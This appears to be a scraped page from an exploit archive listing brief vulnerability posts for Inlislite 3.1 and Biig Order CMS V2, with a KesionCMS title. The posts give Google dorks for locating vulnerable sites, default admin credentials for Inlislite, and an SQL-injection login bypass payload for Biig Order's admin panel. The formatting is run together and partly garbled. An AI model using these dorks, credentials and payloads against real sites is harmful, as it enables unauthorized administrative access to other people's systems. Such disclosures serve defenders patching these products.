jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

KesionCMS ASP 9.5 Add Administrator

Inlislite version 3.1 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Inlislite V3.1 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://inlislite.perpusnas.go.id/?read=installerphp                                                               |  | # Dork      : Inlislite V3.1 © 2017 - 2018                                                                                       |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=inlislite & pass=inlislite= or user=superadmin & pass=superadmin[+] https://127.0.0.1.online/backend/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Inlislite 3.1 Insecure Settings

Biig Order version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ================================================================================| # Title     : E-commerce Biig Order CMS V2 Auth by Pass Vulnerability        || # Author    : indoushka                                                      || # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits)        | | # Vendor    : https://www.vaskar.in/                                         |  | # Dork      : "shop_detail.php?detail="                                      |================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : User & Pass : ' or 0=0 #[+] https://127.0.0.1/www/biigorder.com/admin/manage-order.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |===================================================================================================

Tag

#firefox